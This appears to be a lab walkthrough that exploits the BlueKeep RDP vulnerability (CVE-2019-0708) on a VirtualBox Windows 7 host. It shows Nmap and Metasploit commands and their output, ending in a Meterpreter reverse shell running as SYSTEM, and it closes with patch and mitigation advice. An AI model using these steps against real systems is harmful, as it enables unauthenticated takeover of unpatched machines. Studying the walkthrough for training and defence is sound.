![](https://static.wixstatic.com/media/642e54_214def3fca764db3a0831dd64a47b8c2~mv2.jpeg/v1/fill/w_980,h_980,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/642e54_214def3fca764db3a0831dd64a47b8c2~mv2.jpeg)
Description - What is BlueKeep?
BlueKeep (CVE-2019-0708) is a security vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation that allows unauthenticated remote code execution. The bug is a use-after-free in the kernel-mode RDP driver, triggered by binding the internal MS_T120 virtual channel to a slot other than its fixed one during connection setup, before any credentials are presented. First reported in May 2019, it is present in all unpatched Windows NT-based versions of Windows from Windows 2000 through Windows Server 2008 R2 and Windows 7; Windows 8 and later are not affected. Microsoft issued a security patch (including an out-of-band update for several versions that had already reached end-of-life, such as Windows XP) on 14 May 2019. On 13 August 2019, related RDP vulnerabilities, collectively named DejaBlue, were reported to affect newer Windows versions, from Windows 7 through Windows 10 and their server counterparts. On 6 September 2019, a Metasploit exploit module for the wormable BlueKeep vulnerability was released publicly.
Nmap Scan
We start by running Nmap against the target machine (a SYN scan of the default top 1000 TCP ports):
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS 10.0.2.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-17 12:09 EST
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:A5:43:C1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.66 seconds
As we can see from the Nmap results, port `3389` (`ms-wbt-server`, i.e. RDP) is **open**. An open port only tells us that RDP is listening; the next step is to check whether the service is actually vulnerable.
Metasploit Scan
For this exploit we will search Metasploit for `bluekeep` and see which modules are available.
┌──(kali㉿kali)-[~]
└─$ msfconsole
=[ metasploit v6.1.39-dev ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with advanced
msf6 > search bluekeep
Matching Modules
================
#  Name                                            Disclosure Date  Rank    Check  Description
-  ----                                            ---------------  ----    -----  -----------
0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >
What does this module do?
To find out what this module does, we run `show info` (the `info` command gives the same output) to read its description.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show info
Description:
  This module checks a range of hosts for the CVE-2019-0708
  vulnerability by binding the MS_T120 channel outside of its normal
  slot and sending non-DoS packets which respond differently on
  patched and vulnerable hosts. It can optionally trigger the DoS
  vulnerability.
In other words, the check binds MS_T120 in a slot other than its fixed one (index 31) and watches how the server reacts. A patched server ignores the request and forces the channel back to its fixed slot; an unpatched server accepts the bind and later tries to clean the channel up, which is the tell the scanner looks for. By default it stops short of triggering the use-after-free.
Setting Options
Now that we know what this module does, next step is to see what options we have to set.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options
Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
RDP_DOMAIN                        no        The client domain name to report during connect
RDP_USER                          no        The username to report during connect, UNSET = random
RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT            3389             yes       The target port (TCP)
THREADS          1                yes       The number of concurrent threads (max one per host)
Auxiliary action:
Name  Description
----  -----------
Scan  Scan for exploitable targets
As shown above, the only option we need to set is `RHOSTS`. The `RDP_CLIENT_*` values are just what the scanner reports about itself in the client info during connect and can stay at their defaults, and `THREADS` only matters when `RHOSTS` is a range or list of hosts.
To set this option to our target machine we will use the `set` command
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 10.0.2.15
RHOSTS => 10.0.2.15
Now with our `RHOSTS` set we can use the `run` command and find out whether the target machine is vulnerable.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[+] 10.0.2.15:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.0.2.15:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Our target machine is vulnerable. The message explains why: the server let the scanner bind MS_T120 outside its normal slot and then attempted to clean that channel up, which is exactly the behaviour the May 2019 patch removed. Because the scanner only sends non-crashing packets unless told otherwise, this check is suitable for sweeping a range of hosts; the exploit module that follows is not. The next step is exploiting the vulnerability.
Exploiting a vulnerability
As shown previously we will once again search for bluekeep, but instead of the scanner this time we use `exploit/windows/rdp/cve_2019_0708_bluekeep_rce`. Its rank is `manual`, which in Metasploit means the operator has to pick the target by hand and a wrong choice can crash the host rather than fail cleanly.
Let's begin.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
Setting our options
We must now look at our options and set them.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
RDP_DOMAIN                        no        The client domain name to report during connect
RDP_USER                          no        The username to report during connect, UNSET = random
RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT            3389             yes       The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.0.2.5         yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic targeting via fingerprinting
As before we focus on the `RHOSTS` option and set it with `set RHOSTS` followed by the target's IP. `LHOST` and `LPORT` are the attacker-side listener for the reverse connection; Metasploit has pre-filled `LHOST` with the Kali interface address `10.0.2.5`, which the target can reach, so they can stay as they are.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 10.0.2.15
RHOSTS => 10.0.2.15
Setting your target
Setting your target correctly is important. This module only carries 64-bit targets, so it will not run against a 32-bit machine. That is a limitation of the module, not of the vulnerability: 32-bit Windows 7 and Windows Server 2008 are still vulnerable to CVE-2019-0708, they just cannot be exploited with this module.
The targets are split by hypervisor because the exploit grooms the kernel non-paged pool and overwrites the freed MS_T120 object at a hard-coded kernel address (the `target address` printed later in the exploit output), and that address differs between platforms. Choosing the wrong target usually crashes the host with a BSOD instead of returning a shell.
The default target is `0 Automatic targeting via fingerprinting`. To change it we run `show targets` to list the targets we can choose from.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
In my case I will set the target to 2, `Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)`, since the Nmap scan already identified the target's NIC as an Oracle VirtualBox adapter.
To do this I simply type:
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
Great, now that our target is set we move on to the final stage.
Final Stage - The Exploit
Now that we know the target machine is vulnerable to BlueKeep and have all of our options set, the final step is to see whether we can gain access.
To do this we run the `exploit` command (`run` is an alias for it inside an exploit module) and watch for a session. The module re-runs the scanner as an automatic check first; `set AutoCheck false` disables that.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] 10.0.2.15:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.2.15:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 10.0.2.15:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.0.2.15:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.2.15:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.0.2.15:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[!] 10.0.2.15:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.0.2.15:3389 - Surfing channels ...
[*] 10.0.2.15:3389 - Lobbing eggs ...
[*] 10.0.2.15:3389 - Forcing the USE of FREE'd object ...
[!] 10.0.2.15:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (201283 bytes) to 10.0.2.15
[*] Meterpreter session 1 opened (10.0.2.5:4444 -> 10.0.2.15:49161) at 2022-12-17 05:07:02 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
As shown above we have successfully gained access to the machine using the BlueKeep exploit. Because the bug lives in the kernel-mode RDP driver, the session runs as `NT AUTHORITY\SYSTEM` without any credentials being involved. The same facts point at the fixes on the defending side: install the May 2019 update (KB4499175 security-only or KB4499164 monthly rollup on Windows 7 SP1 / Server 2008 R2), enable Network Level Authentication so that MS_T120 cannot be bound before authentication, and do not expose 3389 to untrusted networks.
To find out more information about Blue keep click [here](https://en.wikipedia.org/wiki/BlueKeep)